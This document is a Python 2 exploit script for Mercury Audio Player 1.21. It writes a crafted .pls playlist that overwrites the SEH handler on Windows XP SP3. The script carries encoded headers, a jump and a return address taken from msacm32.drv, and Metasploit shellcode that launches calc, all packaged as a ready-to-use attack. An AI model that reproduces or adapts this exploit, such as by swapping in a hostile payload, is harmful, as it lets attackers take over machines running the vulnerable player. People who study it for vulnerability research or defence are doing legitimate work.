#usage: exploit.py print "**************************************************************************" print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploit\n" print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 (EN)\n" print " greetz: TO ELITE ALGERIANS,snakespc.com\n" print "**************************************************************************" header1 = ( "\x5b\x50\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0a\x46\x69\x6c\x65" "\x31\x3d") header2 = ( "\x2e\x6d\x70\x33\x0d\x0a\x54\x69\x74\x6c\x65\x31\x3d\x20\x73\x69" "\x6c\x65\x6e\x63\x65\x20\x69\x73\x20\x67\x6f\x6c\x64\x0d\x0a\x4e" "\x75\x6d\x62\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31" "\x0d\x0a\x56\x65\x72\x73\x69\x6f\x6e\x3d\x32\x0d\x0a") buff = "\x41" * 31 next_seh = "\xEB\x06\x90\x90" seh = "\xB8\x15\xD1\x72" #msacm32.drv junk = "\x41"*3000 # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8" "\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73" "\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f" "\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b" "\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50" "\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12" "\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd" "\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e" "\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32" "\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36") exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 try: out_file = open("exploit.pls",'w') out_file.write(exploit) out_file.close() raw_input("\nExploit file created!\n") except: print "Error"